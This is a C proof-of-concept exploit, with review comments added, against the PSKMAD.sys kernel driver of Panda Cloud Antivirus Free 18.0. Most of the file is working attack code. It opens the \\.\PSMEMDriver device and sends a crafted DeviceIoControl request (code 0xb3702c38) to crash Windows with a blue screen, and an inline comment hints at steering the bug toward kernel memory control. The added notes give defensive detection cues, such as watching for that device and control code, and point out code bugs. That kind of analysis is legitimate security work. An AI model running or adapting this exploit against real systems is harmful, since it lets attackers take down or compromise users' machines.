/* # Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
 # Date: 2017-04-29
 # Exploit Author: Peter baris
 # Vendor Homepage: http://www.saptech-erp.com.au
 # Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
 # Version: 18.0
 # Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
 # CVE : requested */

/*
 * Review notes (defender reading of this proof-of-concept):
 *  - The observable behaviour is a user-mode process opening the device
 *    \\.\PSMEMDriver with read/write access and issuing control code
 *    0xb3702c38 with a zero-length input buffer (nInBufferSize is passed
 *    as NULL below).  That pair (device name + control code from an
 *    unprivileged process) is the thing to watch for, and a device ACL or
 *    vendor fix for the driver's input-length validation is the mitigation;
 *    the driver's internals are not visible here, so the exact crash cause
 *    is not established by this file.
 *  - "stdafx.h" is a Visual Studio precompiled-header stub; the file
 *    presumably builds only inside an MSVC project.
 */
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>

/* Device name of the Panda driver interface that the PoC talks to. */
#define DEVICE_NAME L"\\\\.\\PSMEMDriver"

/* NOTE(review): the cast assumes a UNICODE build so that LPCTSTR == LPCWSTR
 * matches the L"" literal; in an ANSI build the cast silently mislabels a
 * wide string as narrow. */
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;

/*
 * Open the driver's device object for read+write with no sharing.
 * Returns the handle from CreateFile; main() compares it against
 * INVALID_HANDLE_VALUE, which is the failure value for CreateFile
 * (the NULL initialisation of hFile is therefore dead).
 * dwFlagsAndAttributes is passed as NULL (0); the trailing 0 is
 * hTemplateFile.  The parameter shadows the file-scope FileName.
 */
HANDLE GetDeviceHandle(LPCTSTR FileName)
{
    HANDLE hFile = NULL;
    hFile = CreateFile(FileName, GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, NULL, 0);
    return hFile;
}

/*
 * Entry point.  Opens the device, builds a 0x800-byte pattern buffer in
 * user memory, sends one DeviceIoControl request and then attempts a
 * best-effort cleanup.  Exit status: 1 if the device or the buffer could
 * not be obtained, 0 otherwise (reached only if the machine survives the
 * request).
 */
int main()
{
    HANDLE hFile = NULL;
    PVOID64 lpInBuffer = NULL;
    /* NOTE(review): DeviceIoControl's lpBytesReturned parameter is LPDWORD;
     * taking the address of a ULONG64 here is a pointer-type mismatch that
     * MSVC reports as a warning in C and an error in C++.  The value is
     * never read. */
    ULONG64 lpBytesReturned;
    PVOID64 BuffAddress = NULL;
    SIZE_T BufferSize = 0x800;

    printf("Trying the get the handle for the PSMEMDriver device.\r\n");
    hFile = GetDeviceHandle(FileName);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
        return 1;
    }

    // Allocate memory for our buffer
    /* PAGE_EXECUTE_READWRITE is more than a plain data buffer needs;
     * PAGE_READWRITE would serve the same purpose. */
    lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (lpInBuffer == NULL)
    {
        printf("VirtualAlloc() failed. \r\n");
        return 1;
    }

    /* Buffer layout produced by the three writes below (all offsets from
     * lpInBuffer).  Both stores are 8 bytes wide and overlap:
     *   [0x0..0x7]   <- 0x000000000542DF91B  (8-byte store)
     *   [0x4..0xB]   <- 0x0000000042424242  (8-byte store; overwrites the
     *                   upper zero bytes of the first store, so bytes
     *                   0x4..0x7 end up as 0x42424242 and 0x8..0xB as 0)
     *   [0x8..0x7FF] <- 0x41 repeated       (overwrites bytes 0x8..0xB again)
     * Net content: 4 bytes of the first constant, 4 bytes of 0x42, then
     * 0x41 to the end.  The author's own "???" shows the meaning of the
     * first constant is unconfirmed. */
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
    *(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
    *(PULONG64)BuffAddress = (ULONG64)0x42424242;
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
    RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);

    /* Single request that triggers the reported crash.  Arguments in order:
     * control code, input buffer, nInBufferSize = NULL (0), output buffer,
     * nOutBufferSize, bytes-returned pointer, overlapped.  The return value
     * is discarded, so a rejected request is indistinguishable from one the
     * driver accepted. */
    DeviceIoControl(hFile, 0xb3702c38, lpInBuffer, NULL, //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
        NULL, NULL, &lpBytesReturned, NULL);

    /*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
    printf("Cleaning up.\r\n");
    /* NOTE(review): with MEM_RELEASE, VirtualFree requires dwSize == 0;
     * sizeof(lpInBuffer) is 8, so this call fails with
     * ERROR_INVALID_PARAMETER and the region is not released until process
     * exit.  Its return value is not checked, so the "Resources freed up."
     * message is printed regardless. */
    VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
    CloseHandle(hFile);
    printf("Resources freed up.\r\n");
    return 0;
}